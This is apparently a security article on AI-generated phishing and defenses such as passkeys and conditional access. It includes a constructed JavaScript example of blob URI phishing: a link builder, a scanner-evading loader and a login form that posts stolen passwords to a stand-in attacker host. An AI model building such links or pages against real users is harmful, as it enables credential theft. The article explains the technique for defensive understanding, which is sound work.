Email security and phishing concept

The standard advice for spotting phishing emails — look for grammar errors, suspicious sender addresses, urgent language — was built around a threat model that assumed attackers were working manually or with crude automation. That assumption has been increasingly wrong since late 2023, and the 2025 data makes it hard to ignore.

A 2025 academic study found that AI-crafted spear-phishing emails achieved a 54% click rate, against 12% for the study's generic control emails; emails hand-written by human experts in the same study did about as well as the AI-generated ones, so the change is not that a model writes better than an expert but that it does the reconnaissance and personalization for every target at near-zero cost. Campaigns attributed to AI-assisted tools rose roughly 400% between June and November 2025, according to Varonis's State of Phishing Report. The Anti-Phishing Working Group recorded more than 892,000 phishing attacks in Q3 2025 alone. Scale and quality have improved at the same time, which is an unusual combination: mass campaigns used to be sloppy and polished ones used to be rare.

Why the traditional signals have stopped working

Generative AI can produce grammatically clean, contextually plausible, multilingual phishing emails at scale. The grammar check that used to catch a meaningful percentage of attempts no longer does. More concerning is the personalization: attackers can feed scraped LinkedIn data, public GitHub activity, or leaked corporate directories into an LLM to generate emails that reference an actual project, a real colleague's name, or a genuine internal process. When an email reads as if it came from someone in your organization who knows what you're working on, the psychological triggers that normally prompt skepticism don't fire.

There has also been growth in techniques that defeat link scanning outright. Researchers in 2025 documented blob URI phishing: the link in the email leads, often via a redirect through a legitimate page, to an attacker-controlled page whose JavaScript assembles the credential-harvesting form inside the victim's browser and displays it from a blob: URL created with URL.createObjectURL. A blob: URL is only valid inside the browser that created it, so a secure email gateway that fetches and inspects the linked page, including AI-based filters that classify the fetched content, never sees the login form. (These are blob URLs, not data: URIs; a data: URI carries the page inline in the link and is visible to anything that can parse the link.) Credentials typed into the rendered page are then sent to attacker infrastructure from the browser.
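
As an added illustration (example code written for this page, not from the researchers' report or any real kit), the following shows why a gateway that fetches the linked URL sees nothing to flag: the page it retrieves has no form, while the page the victim sees does, and the blob: URL the victim lands on cannot be fetched from outside the browser at all. Real kits generate the form in script; this example carries it in the URL fragment to stay short, and the effect on the scanner is the same. The HTML, the domain names (example.invalid) and the scanner's indicator list are all constructed.

```javascript
// Added example (not from the original page): why a blob: URI phishing page is
// invisible to a URL scanner that fetches the linked page server-side. The HTML,
// domain names and the scanner's indicator list are constructed for illustration.

// 1. What the email link points to, and therefore what a gateway's URL scanner
//    fetches: a page with no form, no password field and no POST target. The
//    form travels in the URL fragment, which browsers never send to the server,
//    and is rendered from a blob: URL that exists only in this browser.
const LANDING_HTML = `<!doctype html><html><body><script>
  const html = atob(location.hash.slice(1));
  location.href = URL.createObjectURL(new Blob([html], { type: "text/html" }));
</script></body></html>`;

// 2. The page the victim actually sees (constructed; collector.example.invalid
//    stands in for attacker infrastructure).
const RENDERED_HTML = `<!doctype html><html><body>
<h1>Sign in to your account</h1>
<form method="POST" action="https://collector.example.invalid/submit">
  <input name="user"><input name="password" type="password"><button>Sign in</button>
</form></body></html>`;

// The attacker base64-encodes the form into the fragment of the landing URL.
function buildPhishLink(landingUrl, renderedHtml) {
  return landingUrl + "#" + Buffer.from(renderedHtml, "utf8").toString("base64");
}

// A naive static scan of fetched HTML, of the kind a link-scanning gateway runs.
function staticScanFindings(html) {
  const checks = [
    ["login form", /<form\b/i],
    ["password field", /type=["']?password/i],
    ["posts to external host", /action=["']https?:\/\//i],
    ["credential wording", /\b(sign in|password|verify your account)\b/i],
  ];
  return checks.filter(([, re]) => re.test(html)).map(([name]) => name);
}

// A scanner can only fetch http(s) URLs. A blob: URL is a handle into one
// browser's memory and is unreachable from anywhere else.
function scannerCanFetch(url) {
  return /^https?:/i.test(url);
}

// What a scanner reconstructs from the link versus what the victim gets.
function demo() {
  const link = buildPhishLink("https://files.example.invalid/view", RENDERED_HTML);
  // The gateway strips the fragment and fetches the URL; it gets LANDING_HTML.
  const fetchedUrl = link.split("#")[0];
  const scannerSees = staticScanFindings(LANDING_HTML);
  // Only the browser decodes the fragment and renders it from a blob: URL.
  const fragment = link.split("#")[1];
  const victimSees = staticScanFindings(Buffer.from(fragment, "base64").toString("utf8"));
  // Constructed blob URL of the shape a browser would create for this origin.
  const blobUrl = "blob:https://files.example.invalid/9b1deb4d-3b7d-4bad-9bdd-2b0d7b3dcb6d";
  return { fetchedUrl, scannerSees, victimSees, blobFetchable: scannerCanFetch(blobUrl) };
}

module.exports = { LANDING_HTML, RENDERED_HTML, buildPhishLink, staticScanFindings, scannerCanFetch, demo };
```

Running demo() gives an empty findings list for what the scanner fetched and all four indicators for what the victim rendered. The practical consequence is that URL reputation and fetched-page classification cannot catch this class on their own; the inspection has to happen where the page is rendered (an instrumented browser that records blob: navigations and password forms in the DOM, or the user's endpoint), or the credential itself has to be made worthless to a proxy, which is the passkey argument made later on this page.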

By early 2025, AI-powered phishing made up over 80% of observed social engineering activity. That figure comes from SentinelOne's analysis and may vary depending on how campaigns are classified, but the directional signal is consistent across multiple sources.

Who gets targeted and what the outcome typically looks like

Financial services remain the most heavily targeted sector — credentials from banking systems are immediately monetizable. Financial institutions account for roughly 23.5% of all phishing attacks globally (APWG, 2024–2025 data). Healthcare is targeted differently: the goal is usually data for insurance fraud or identity theft rather than immediate financial access, but the per-incident cost is higher — the average healthcare data breach hit $11.2 million in 2025.

Stolen credentials are the most common outcome. The 2025 Verizon DBIR puts credential abuse at about 22% of breaches as the initial access vector, and dwell time (how long attackers persist before detection) tends to be longer when the entry point was a legitimate account rather than an exploited vulnerability: there is no exploit payload for endpoint tooling to flag, the session comes from an ordinary browser, and every action is logged under the user's name. An attacker using valid credentials looks normal to most monitoring tools unless something compares the sign-in against the account's own history (device, network, time of day, what it touches).

SIM swapping remains a persistent amplifier. Once attackers have a username and password, SMS-based two-factor authentication provides little protection if they can get the victim's phone number transferred by social engineering the mobile carrier. Moving from SMS to an authenticator app closes the SIM-swap path but not the phishing one: a one-time code typed into a proxied fake site is relayed to the real site just as the password is. This is why security teams that have dealt with both patterns end up recommending hardware security keys (FIDO2) rather than a different kind of code.

What actually helps

Phishing simulations that include AI-generated samples, rather than older template-based attacks, give employees exposure to the current threat model rather than a 2019 version of it. There's a meaningful difference in how people respond to well-constructed, personalized messages versus the generic "your account will be suspended" templates.

Passkeys (WebAuthn/FIDO2 credentials) are phishing-resistant by design. A passkey is bound to the relying party's domain at registration: the browser will only let a page use a credential whose relying party ID matches the page's own domain, and the signed response includes the origin the user was actually on, which the server checks against its own. A look-alike site cannot ask the authenticator for the bank's key, and if an adversary-in-the-middle relays a response, the origin mismatch fails verification. There is no code for the user to read off and type into the wrong place. This is a structural defense rather than a behavioral one, which is why security teams prefer it. Adoption is still early, but the technology exists and works.

Conditional access policies, which require device compliance, constrain location, or demand step-up authentication for sensitive actions, limit what a stolen credential actually unlocks: authentication can succeed and the session can still be refused the one action the attacker came for. Least privilege matters for the same reason. An account with broad access is a better target than one with narrow permissions, and a credential is worth more to an attacker when the account can reach many systems.
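
The following is an added example (not the configuration of any real identity provider) of the two points made above and in the credential-theft paragraph earlier: a sign-in with valid credentials passes authentication, and it is the policy layer, comparing the event against the account's own history and the sensitivity of the requested action, that decides whether it is allowed, stepped up, or blocked. The policy, the account's sign-in history, the action names and the ASN numbers are all constructed.

```javascript
// Added example (not from the original page): a small conditional-access
// evaluator for sign-ins that have already passed password + MFA. Policy,
// history, action names and ASNs are constructed for illustration.

const POLICY = {
  allowedCountries: ["US", "CA"],
  // Actions that require phishing-resistant MFA in the current session.
  sensitiveActions: ["payments.transfer", "mailbox.forwarding-rule", "admin.role-assign"],
  // Actions that additionally require a managed, compliant device.
  requireCompliantDeviceFor: ["payments.transfer", "admin.role-assign"],
};

// Prior successful sign-ins for this account (constructed history).
const HISTORY = [
  { deviceId: "laptop-7f3a", country: "US", asn: 7922 },
  { deviceId: "phone-c21d", country: "US", asn: 21928 },
];

// Returns { decision: "allow" | "step_up" | "block", reasons: [...] }.
function evaluateSignIn(event, policy = POLICY, history = HISTORY) {
  const reasons = [];
  if (!policy.allowedCountries.includes(event.country)) {
    reasons.push(`country ${event.country} not allowed`);
    return { decision: "block", reasons };
  }
  const sensitive = policy.sensitiveActions.includes(event.action);
  if (sensitive && policy.requireCompliantDeviceFor.includes(event.action) && !event.deviceCompliant) {
    reasons.push("sensitive action from non-compliant device");
    return { decision: "block", reasons };
  }
  // Password plus SMS/TOTP is not phishing-resistant; only FIDO2 counts here.
  const phishingResistant = event.authMethods.includes("fido2");
  const knownDevice = history.some((h) => h.deviceId === event.deviceId);
  const knownNetwork = history.some((h) => h.country === event.country && h.asn === event.asn);
  if (sensitive && !phishingResistant) reasons.push("sensitive action requires phishing-resistant MFA");
  if (!knownDevice) reasons.push("unseen device for this account");
  if (!knownNetwork) reasons.push("unseen network for this account");
  // Anything anomalous that was not already backed by a phishing-resistant factor
  // gets a step-up challenge rather than silent access.
  if (reasons.length > 0 && !phishingResistant) return { decision: "step_up", reasons };
  return { decision: "allow", reasons };
}

// Constructed events: the account owner, then an attacker holding the owner's
// password and a relayed one-time code, signing in from a fresh VM.
const EVENTS = [
  { name: "owner reads mail from known laptop", deviceId: "laptop-7f3a", deviceCompliant: true,
    country: "US", asn: 7922, action: "mail.read", authMethods: ["password", "totp"] },
  { name: "attacker sets a forwarding rule from a new device", deviceId: "vm-0b9e", deviceCompliant: false,
    country: "US", asn: 396982, action: "mailbox.forwarding-rule", authMethods: ["password", "totp"] },
  { name: "attacker attempts a transfer", deviceId: "vm-0b9e", deviceCompliant: false,
    country: "US", asn: 396982, action: "payments.transfer", authMethods: ["password", "totp"] },
  { name: "attacker signs in from outside allowed countries", deviceId: "vm-0b9e", deviceCompliant: false,
    country: "DE", asn: 3320, action: "mail.read", authMethods: ["password", "totp"] },
  { name: "owner approves a transfer with a hardware key", deviceId: "laptop-7f3a", deviceCompliant: true,
    country: "US", asn: 7922, action: "payments.transfer", authMethods: ["password", "fido2"] },
];

function demo() {
  return EVENTS.map((e) => ({ name: e.name, ...evaluateSignIn(e) }));
}

module.exports = { POLICY, HISTORY, EVENTS, evaluateSignIn, demo };
```

The second event is the one that matters: the attacker has authenticated successfully, yet the forwarding-rule change (a standard business-email-compromise step) is held for step-up because the device and network are new to this account and the session has no phishing-resistant factor. The third and fourth events never reach the action at all. Note the order of checks: the hard blocks (geography, device compliance for high-impact actions) run before the history comparison, so an attacker cannot satisfy them by first "warming up" a device with harmless reads.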

The honest assessment is that detection-based defenses are in a losing position against sufficiently sophisticated AI-generated attacks. The more durable approaches focus on what authenticated credentials can actually do, rather than trying to catch every malicious email before it lands.